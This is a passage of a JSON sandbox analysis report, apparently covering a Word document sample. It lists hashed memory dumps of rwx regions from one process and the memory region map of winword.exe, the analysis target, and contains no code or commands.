"process_dumps/process_00000008-region_00001308-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001308-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_421", "md5_hash": "b9b412a5b21f21ff7c08f0b2177bb8a0", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ed08dbab9b4ef5ab27a9802625cbedd2da160d5c", "sha256_hash": "8dbf039c35d14d2bb7e933eead8c2f3cfe19e31339d9a88601804e26e2f3a1af", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001309-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001309-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_422", "md5_hash": "4f9112c677b4c2f03906c3468d1ed5af", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "805d70ab2a5fde5d4dd8e19a80c65831f66914bb", "sha256_hash": "a555cc36fca8dd69bc07495896e3bb5a045c3febee67b15fe60ad2520dff6ce1", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001311-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001311-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_424", "md5_hash": "57d872d61680df0f1a97de7dca6b4c50", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "043702b29339ebaa9117bbac6a4dfa0a0e5af562", "sha256_hash": "b918a4dad0db2af599c26c77081204ef1cc21c6663c36ea9e82e7546326def20", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001329-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001329-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_425", "md5_hash": "a5398829134a77a94e0e38478a248d7b", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "93a02ebf5ebf72ceff584387468b9226a1681c2a", "sha256_hash": "1a5ba39a70d65aecb09364d9e6f069ea6e051b421a2af46ee6c5312d3a042c86", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001331-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001331-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_427", "md5_hash": "afeef562103d8069aa3db523f0c71993", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "dbdb016ac979a25489138276501d73e30ebc9822", "sha256_hash": "73d9d1b5ed4abe3b88e4162e50b46cb29ed74ca44824f9d5aa3057d65fa7fe19", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001332-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001332-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_428", "md5_hash": "76c72407593c15c95ce8a686e0c407bc", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7b0acd5b0cb40f9fb7def34c8b6f90942db52694", "sha256_hash": "d2ac9b128bee6bd284199c6ecba0b0f6c4a12f2381f8dedb65aa560d11ed6b51", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001334-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001334-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_430", "md5_hash": "ee94863da80e00bfe22a67d2f288ca14", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "649485df95af19f6774d8a93f4a4f46a0b5d4c22", "sha256_hash": "96cad8799d4b425e175e7adb5c38290781168c6140cb35882be56a7447c9003a", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001335-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001335-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_431", "md5_hash": "e09cc36d655f8709ec94f68da2e99cc6", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0232fc0f6ce7d083760814eee739b903c11a746d", "sha256_hash": "31a911a8b5fc7e1f7d7ebafc2e9fef9b4e23e367316696eeef947f748cd0449c", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001339-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001339-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_434", "md5_hash": "dbe9aa4e7348ee0b337fd743f369c23b", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "32d23e9522e480111954a66945452d2d396ad819", "sha256_hash": "c987332565a4ca44854e91597d21c9fa7ba5e8bbc840d7ea3d3bbf78aa05865e", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001341-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001341-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_436", "md5_hash": "3e42d25a7099747c1e86dcf102b3fabe", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ff6bf0a458fc65ae0a0394974fd06472d4279c73", "sha256_hash": "8332112faa7b1b96dc8cda8be353ee0fa345cb000571f39d81d035c274fa41e8", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001342-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001342-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_437", "md5_hash": "24d52bf2d22dfd07ae871b3e3d4cd671", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f74dd5e974969921373928dd5c132de9ee033c94", "sha256_hash": "69ec403106580b458a4d1a415729a08aa52be5a96dde5ae1203a92988d6c4ca9", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001344-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001344-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_439", "md5_hash": "9a17dd22563dcb2365ec559cf6e5a86a", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "54793b737a7c99e8d900efb775089192195fc879", "sha256_hash": "36c853d25921166858e0283c64e5bb4ac5bcacbe7c160b9655d80f4f4e56dd95", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000008-region_00001345-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "filename": "process_00000008-region_00001345-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "id": "proc_dump_440", "md5_hash": "9ab1b544d877ef3cf8d9029da121f20d", "ref_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "908f5ee12761eb324b83ca536fccd5b6db482467", "sha256_hash": "2e0c332d296ccf7a397e3ac9eb88d0480055ea05ad4f892ea095d24494cc689f", "size": 4096, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_133", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:22.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_134", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:22.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_135", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:22.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:22.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_137", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:22.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_138", "name": "private_0x00000000000c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 786432, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_139", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_140", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_141", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_142", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_143", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 200704, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_144", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1449983, "entry_point": 0, "filename": null, "id": "region_145", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_146", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3698687, "entry_point": 0, "filename": null, "id": "region_149", "name": "pagefile_0x0000000000380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3670016, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_150", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3809279, "entry_point": 0, "filename": null, "id": "region_151", "name": "pagefile_0x00000000003a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3801088, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3874815, "entry_point": 0, "filename": null, "id": "region_152", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3940351, "entry_point": 0, "filename": null, "id": "region_153", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4132863, "entry_point": 0, "filename": null, "id": "region_155", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4263935, "entry_point": 0, "filename": null, "id": "region_156", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4395007, "entry_point": 0, "filename": null, "id": "region_157", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_158", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x0000000000540000", "norm_filename": null, "region_type": "private_memory", "start_va": 5505024, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_160", "name": "private_0x0000000000640000", "norm_filename": null, "region_type": "private_memory", "start_va": 6553600, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 6819839, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 6946815, "entry_point": 0, "filename": null, "id": "region_162", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 8552447, "entry_point": 0, "filename": null, "id": "region_163", "name": "pagefile_0x00000000006a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6946816, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 10162175, "entry_point": 0, "filename": null, "id": "region_164", "name": "pagefile_0x0000000000830000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8585216, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10223616, "type": "region", "version": 1 }, "end_va": 31195135, "entry_point": 0, "filename": null, "id": "region_165", "name": "pagefile_0x00000000009c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10223616, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 32108543, "entry_point": 0, "filename": null, "id": "region_166", "name": "pagefile_0x0000000001dc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31195136, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32116735, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000001ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32112640, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32313343, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 32444415, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x0000000001ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32440320, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32571392, "type": "region", "version": 1 }, "end_va": 32575487, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000001f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 32571392, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 32706559, "entry_point": 0, "filename": null, "id": "region_172", "name": "pagefile_0x0000000001f30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32702464, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 32788479, "entry_point": 0, "filename": null, "id": "region_173", "name": "pagefile_0x0000000001f40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32768000, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 32837631, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x0000000001f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 32833536, "timestamp": "00:00:22.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 33423359, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x0000000001f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 32899072, "timestamp": "00:00:22.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 33431551, "entry_point": 0, "filename": null, "id": "region_176", "name": "pagefile_0x0000000001fe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33423360, "timestamp": "00:00:22.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:00:22.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33558527, "entry_point": 0, "filename": null, "id": "region_178", "name": "pagefile_0x0000000002000000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33554432, "timestamp": "00:00:22.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 33624063, "entry_point": 0, "filename": null, "id": "region_179", "name": "pagefile_0x0000000002010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33619968, "timestamp": "00:00:22.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 34734079, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x0000000002020000", "norm_filename": null, "region_type": "private_memory", "start_va": 33685504, "timestamp": "00:00:22.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 34734080, "type": "region", "version": 1 }, "end_va": 34738175, "entry_point": 34734080, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_181", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 34734080, "timestamp": "00:00:22.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 159744, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34959359, "entry_point": 34799616, "filename": "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db", "id": "region_182", "name": 